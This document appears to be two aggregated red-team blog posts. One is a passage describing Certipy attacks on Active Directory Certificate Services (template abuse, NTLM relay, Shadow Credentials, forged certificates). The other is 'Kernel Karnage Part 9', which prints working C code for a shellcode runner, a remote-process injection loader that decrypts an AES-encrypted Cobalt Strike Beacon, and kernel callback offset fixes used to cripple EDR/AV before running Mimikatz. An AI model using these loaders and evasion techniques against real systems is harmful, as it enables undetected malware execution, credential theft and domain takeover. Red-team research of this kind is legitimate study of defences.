The next requirement is that the default certificate template SubCA is enabled. We can list the enabled certificate templates on a CA with the -list-templates parameter, and in this case, the SubCA template is not enabled on our CA.

With our Manage CA access right, we can just enable the SubCA certificate template with the -enable-template parameter.

The SubCA certificate template is now enabled, and we’re ready to proceed with the new attack.

The SubCA certificate template is enabled by default, and it’s a built-in certificate template, which means that it cannot be deleted in the Certificate Templates Console (MMC).

The SubCA certificate template is interesting because it is vulnerable to ESC1 (Enrollee Supplies Subject and Client Authentication).

However, only DOMAIN ADMINS and ENTERPRISE ADMINS are allowed to enroll in the SubCA certificate template.

Show Enrollment Rights for Certificate Template

But if a user has the Manage CA access right and the Manage Certificates access right, the user can effectively issue failed certificate requests.

Let’s try to request a certificate based on the SubCA certificate template, where we specify the SAN [email protected].

We get a CERTSRV_E_TEMPLATE_DENIED error, meaning that we are not allowed to enroll in the template. Certipy will ask if we still want to save the private key for our request, and in this case, we answer “y” (for yes). Certipy also prints out the request ID, which we’ll use for issuing the certificate.

With our Manage CA and Manage Certificates access right, we can issue the failed certificate request with the ca command by specifying the request ID in -issue-request parameter.

When we’ve issued the certificate, we can now retrieve it with the req command by specifying the -retrieve parameter with our request ID.

It is now possible to use the certificate to obtain the password hash of the administrator account.

ESC8 — NTLM Relay to AD CS HTTP Endpoints

Find Certificate Authorities with HTTP Web Enrollment (ESC8)

ESC8 is when an Enrollment Service has installed and enabled HTTP Web Enrollment. This is attack is already implemented in Impacket’s ntlmrelayx, but I thought there was room for improvements and new features.

In Certipy, this vulnerability can be seen in the property “Web Enrollment” of the CA.

To start the relay server, we just run the relay command and specify the CA’s IP.

By default, Certipy will request a certificate based on the Machine or User template depending on whether the relayed account name ends with $. It is possible to specify another template with the -template parameter.

We can then use a technique such as PetitPotam to coerce authentication from a computer. In this example, I simply made a dir \\IP\foo\bar from an administrator command prompt.

Certipy will relay the NTLM authentication to the Web Enrollment interface of the CA and request a certificate for the user.

Now, let’s consider a scenario where all certificate requests must be approved by an officer, and we have the Manage Certificates access right.

In this scenario, Certipy will ask if we want to save the private key for our request. In this case, we answer yes.

With our Manage Certificates access right, we can issue the request based on the request ID.

We then start the relaying server again, but this time, we specify -retrieve with our request ID.

Certipy will retrieve the certificate based on the request ID rather than requesting a new one. This is an edge case, but I thought it was interesting to implement nonetheless.

Shadow Credentials

One of the new edges in BloodHound 4.1.0 is AddKeyCredentialLink.

Path from JOHN to JOHNPC

The attack has been dubbed Shadow Credentials, and it can be used for account takeover. As mentioned earlier, this technique is related to certificates, and therefore, I have implemented the attack in Certipy. We can also abuse this technique when we have a “Generic Write” privilege over another user and we don’t want to reset their password.

Auto

The command you’ll likely use the most is auto, which we saw earlier. In essence, Certipy will create and add a new Key Credential, authenticate with the certificate, and then restore the old Key Credential attribute of the account. This is useful if you just want the NT hash of the victim account, like in the previous ESC4 scenario.

Add

If you want to add a Key Credential manually for persistence, you can use the add action. This will add a new Key Credential and save the certificate and private key, which can be used later with Certipy’s auth command.

List

It is also possible to list the current Key Credentials of an account. This is useful for deleting or getting detailed information about a specific Key Credential.

Info

Information about a Key Credential can be retrieved with the info action, where the Key Credential can be specified with the -device-id.

Remove

To remove a Key Credential, you can use the remove action and specify the Key Credential in the -device-id parameter.

Clear

Alternatively, you can just clear all of the Key Credentials for the account if desired.

Golden Certificates

Another new major feature of Certipy is the ability to create “Golden Certificates”. This is a technique for domain persistence after compromising the CA server or domain. It’s an alternative to “Golden Tickets”, but instead of forging tickets, you can forge certificates that can be used for Kerberos authentication.

Backup

The first step is to get the certificate and private key of the CA. Suppose we have compromised the domain administrator administrator and we want to retrieve the certificate and private key of the CA. This can be done in the Certification Authority Console on the CA server, but I have implemented this in Certipy as well.

In essence, Certipy will create a new service on the CA server which will backup the certificate and private key to a predefined location. The certificate and private key will then be retrieved via SMB, and finally the service and files are removed from the server.

Forging

With the CA certificate and private key, we can use Certipy’s new forge command to create certificates for arbitrary users. In this case, we create a certificate for JOHN. The subject doesn’t matter in this case, just the SAN.

We can then use the certificate to authenticate as JOHN.

It also works for the domain controller DC$.

It does not, however, work for disabled accounts, such as the krbtgt account.

Other Improvements

The latest release of Certipy also contains a few minor improvements and adjustments.

Certificate Authority Management

We saw earlier how we could enable a certificate template. If we want to cleanup after ourselves, we can disable the template, as shown below.

We can also remove JOHN as an officer, but we’ll still have our Manage CA access rights.

As we can see below, if we try to perform the ESC7 attack now, we get an “access denied” when trying to issue the certificate.

JOHN can also add another manager, for instance JANE.

JANE can then add a third manager, EVE.

JANE can even remove herself as a manager.

But then she won’t be able to remove EVE as a manager.

Dynamic Endpoints

This is a minor, but important new feature. During one of our engagements, SMB was firewalled off on the CA server. The previous release of Certipy requested certificates via the named pipe cert, and when SMB was firewalled off, then the old version was not able to request certificates.

However, the CA service actually listens on a dynamic TCP endpoint as well. The new version of Certipy will try to connect to the dynamic TCP endpoint, if SMB fails.

Alternatively, you can specify the -dynamic-endpoint parameter to prefer the dynamic TCP endpoint over SMB. This is useful if you don’t want to wait for the timeout for each request when SMB is firewalled off.

For slower connections, such as through a proxy, it’s also possible to specify a longer timeout than the default 5 seconds for almost all types of commands with the -timeout parameter.

The new version of Certipy has many more improvements and parameters than I’ve shown in this blog post. I recommend that you explore the new features and parameters of Certipy if you find yourself in an unusual situation. If you have any issues or feature requests, I encourage you to submit them on Github. I hope you will enjoy the new version of Certipy.

The new version can be found here: https://github.com/ly4k/Certipy


Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

Kernel Karnage – Part 9 (Finishing Touches)

22 February 2022 at 13:03

It’s time for the season finale. In this post we explore several bypasses but also look at some mistakes made along the way.

1. From zero to hero: a quick recap

As promised in part 8, I spent some time converting the application to disable Driver Signature Enforcement (DSE) into a Beacon Object File (BOF) and adding in some extras, such as string obfuscation to hide very common string patterns like registry keys and constants from network inspection. I also changed some of the parameters to work with user input via CobaltWhispers instead of hardcoded values and replaced some notorious WIN32 API functions with their Windows Native API counterparts.

Once this was done, I started debugging the BOF and testing the full attack chain:

  • starting with the EarlyBird injector being executed as Administrator
  • disabling DSE using the BOF
  • deploying the Interceptor driver to cripple EDR/AV
  • running Mimikatz via Beacon.

The full attack is demonstrated below:

2. A BOF a day, keeps the doctor away

With my internship coming to an end, I decided to focus on Quality of Life updates for the InterceptorCLI as well as convert it into a Beacon Object File (BOF) in addition to the DisableDSE BOF, so that all the components may be executed in memory via Beacon.

The first big improvement is to rework the commands to be more intuitive and convenient. It’s now possible to provide multiple values to a command, making it much easier to patch multiple callbacks. Even if that’s too much manual labour, the -patch module command will take care of all callbacks associated with the provided drivers.

Next, I added support for vendor recognition and vendor based actions. The vendors and their associated driver modules are taken from SadProcessor’s Invoke-EDRCheck.ps1 and expanded by myself with modules I’ve come across during the internship. It’s now possible to automatically detect different EDR modules present on a target system and take action by automatically patching them using the -patch vendor command. An overview of all supported vendors can be obtained using the -list vendors command.

Finally, I converted the InterceptCLI client into a Beacon Object File (BOF), enhanced with direct syscalls and integrated in my CobaltWhispers framework.

3. Bigger fish to fry

With $vendor2 defeated, it’s also time to move on to more advanced testing. Thus far, I’ve only tested against consumer-grade Anti-Virus products and not enterprise EDR/AV platforms. I spent some time setting up and playing with $EDR-vendor1 and $EDR-vendor2.

To my surprise, once I had loaded the Interceptor driver, $EDR-vendor2 would detect a new driver has been loaded, most likely using ImageLoad callbacks, and refresh its own modules to restore protection and undo any potential tampering. Subsequently, any I/O requests to Interceptor are blocked by $EDR-vendor2 resulting in a "Access denied" message. The current version of InterceptorCLI makes use of various WIN32 API calls, including DeviceIoControl() to contact Interceptor. I suspect $EDR-vendor2 uses a minifilter to inspect and block I/O requests rather than relying on user land hooks, but I’ve yet to confirm this.

Contrary to $EDR-vendor2, I ran into issues getting $EDR-vendor1 to work properly with the $EDR-vendor1 platform and generate alerts, so I moved on to testing against $vendor3 and $EDR-vendor3. My main testing goal is the Interceptor driver itself and its ability to hinder the EDR/AV. The method of delivering and installing the driver is less relevant.

Initially, after patching all the callbacks associated with $vendor3, my EarlyBird-injector-spawned process would crash, resulting in no Beacon callback. The cause of the crash is klflt.sys, which I assume is $vendor3’s filesystem minifilter or at least part of it. I haven’t pinpointed the exact reason of the crash, but I suspect it is related to handle access rights.

When restoring klflt.sys callbacks, EarlyBird is executed and Beacon calls back successfully. However, after a notable delay, Beacon is detected and removed. Apart from detection upon execution, my EarlyBird injector is also flagged when scanned. I’ve used the same compiled version of my injector for several weeks against several different vendors, combined with other monitoring software like ProcessHacker2, it’s possible samples have been submitted and analyzed by different sandboxes.

In an attempt to get around klflt.sys, I decided to try a different injection approach and stick to my own process.

void main()
{
    const unsigned char shellcode[] = "";
	PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
	DWORD threadID;
	HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
	WaitForSingleObject(hThread, INFINITE);
}

These 6 lines of primitive shellcode injection were successful in bypassing klflt.sys and executing Beacon.

4. Rookie mistakes

When I started my tests against $EDR-vendor3, the first thing that happened wasn’t alarms and sirens going off, it was a good old bluescreen. During my kernel callbacks patching journey, I never considered the possibility of faulty offset calculations. The code responsible for calculating offsets just happily adds up the addresses with the located offset and returns the result without any verification. This had worked fine on my Windows 10 build 19042 test machine, but failed on the $EDR-vendor3 machine which is a Windows 10 build 18362.

for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
	if (*(PUCHAR)instructionAddr == OPCODE_LEA_R13_1[g_WindowsIndex] && 
		*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] &&
		*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {

		OffsetAddr = 0;
		memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
		return OffsetAddr + 7 + instructionAddr;
	}
}

If we look at the kernel base address 0xfffff807'81400000, we can expect the address of the kernel callback arrays to be in the same range as the first 8 most significant bits (0xfffff807).

However, comparing the debug output to the expected address, we can note that the return address (callback array address) 0xfffff808'81903ba0 differs from the expected return address 0xfffff807'81903ba0 by a value of 0x100000000 or compared to the kernel base address 0x100503ba0. The 8 most significant bits don’t match up.

The calculated offset we’re working with in this case is 0xffdab4f7. Following the original code, we add 0xffdab4f7 + 0x7 + 0xfffff80781b586a2 which yields the callback array address. This is where the issue resides. OffsetAddr is a ULONG64, in other words "unsigned long long" which comes down to 0x00000000'00000000 when initialized to 0; When the memcpy() instruction copies over the offset address bytes, the result becomes 0x00000000'ffdab4f7. To quickly solve this problem, I changed OffsetAddr to a LONG and added a function to verify the address calculation against the kernel base address.

ULONG64 VerifyOffsets(LONG OffsetAddr, ULONG64 InstructionAddr) {
	ULONG64 ReturnAddr = OffsetAddr + 7 + InstructionAddr;
	ULONG64 KernelBaseAddr = GetKernelBaseAddress();
	if (KernelBaseAddr != 0) {
		if (ReturnAddr - KernelBaseAddr > 0x1000000) {
			KdPrint((DRIVER_PREFIX "Mismatch between kernel base address and expected return address: %llx\n", ReturnAddr - KernelBaseAddr));
			return 0;
		}
		return ReturnAddr;
	}
	else {
		KdPrint((DRIVER_PREFIX "Unable to get kernel base address\n"));
		return 0;
	}
}

5. Final round

As expected, $EDR-vendor3 is a big step up from the regular consumer grade anti-virus products I’ve tested against thus far and the loader I’ve been using during this series doesn’t cut it anymore. Right around the time I started my tests I came across a tweet from @an0n_r0 discussing a semi-successful $EDR-vendor3 bypass, so I used this as base for my new stage 0 loader.

The loader is based on the simple remote code injection pattern using the VirtualAllocEx, WriteProcessMemory, VirtualProtectEx and CreateRemoteThread WIN32 APIs.

void* exec = fpVirtualAllocEx(hProcess, NULL, blenu, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

fpWriteProcessMemory(hProcess, exec, bufarr, blenu, NULL);

DWORD oldProtect;
fpVirtualProtectEx(hProcess, exec, blenu, PAGE_EXECUTE_READ, &oldProtect);

fpCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, exec, 0, NULL);

I also incorporated dynamic function imports using hashed function names and CIG to protect the spawned suspended process against injection of non-Microsoft-signed binaries.

HANDLE SpawnProc() {
    STARTUPINFOEXA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    SIZE_T attributeSize;

    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
        std::cout << "Could not spawn process" << std::endl;
        DeleteProcThreadAttributeList(si.lpAttributeList);
        return INVALID_HANDLE_VALUE;
    }

    DeleteProcThreadAttributeList(si.lpAttributeList);
    return pi.hProcess;
}

The Beacon payload is stored as an AES256 encrypted PE resource and decrypted in memory before being injected into the remote process.

HRSRC rc = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
DWORD rcSize = fpSizeofResource(NULL, rc);
HGLOBAL rcData = fpLoadResource(NULL, rc);

char* key = (char*)"16-byte-key-here";
const uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };

int blenu = rcSize;
int klen = strlen(key);

int klenu = klen;
if (klen % 16)
    klenu += 16 - (klen % 16);

uint8_t* keyarr = new uint8_t[klenu];
ZeroMemory(keyarr, klenu);
memcpy(keyarr, key, klen);

uint8_t* bufarr = new uint8_t[blenu];
ZeroMemory(bufarr, blenu);
memcpy(bufarr, rcData, blenu);

pkcs7_padding_pad_buffer(keyarr, klen, klenu, 16);

AES_ctx ctx;
AES_init_ctx_iv(&ctx, keyarr, iv);
AES_CBC_decrypt_buffer(&ctx, bufarr, blenu);

Last but not least, I incorporated the Sleep_Mask directive in my Cobalt Strike Malleable C2 profile. This tells Cobalt Strike to obfuscate Beacon in memory before it goes to sleep by means of an XOR encryption routine.

The loader was able to execute Beacon undetected and with the help of my kernel driver running Mimikatz was but a click of the button.

On that bombshell, it’s time to end this internship and I think I can conclude that while having a kernel driver to tamper with EDR/AV is certainly useful, a majority of the detection mechanisms are still present in user land or are driven by signatures and rules for static detection.

6. Conclusion

During this Kernel Karnage series, I developed a kernel driver from scratch, accompanied by several different loaders, with the goal to effectively tamper with EDR/AV solutions to allow execution of common known tools which would otherwise be detected immediately. While there certainly are several factors limiting the deployment and application of a kernel driver (such as DSE, HVCI, Secure Boot), it turns out to be quite powerful in combination with user land evasion techniques and manages to address the AI/ML component of EDR/AV which would otherwise require a great deal of obfuscation and anti-sandboxing.

About the author

Sander is a junior consultant and part of NVISO’s red team. He has a passion for malware development and enjoys any low-level programming or stumbling through a debugger. When Sander is not lost in 1s and 0s, you can find him traveling around Europe and Asia. You can reach Sander on LinkedIn or Twitter.

❌
❌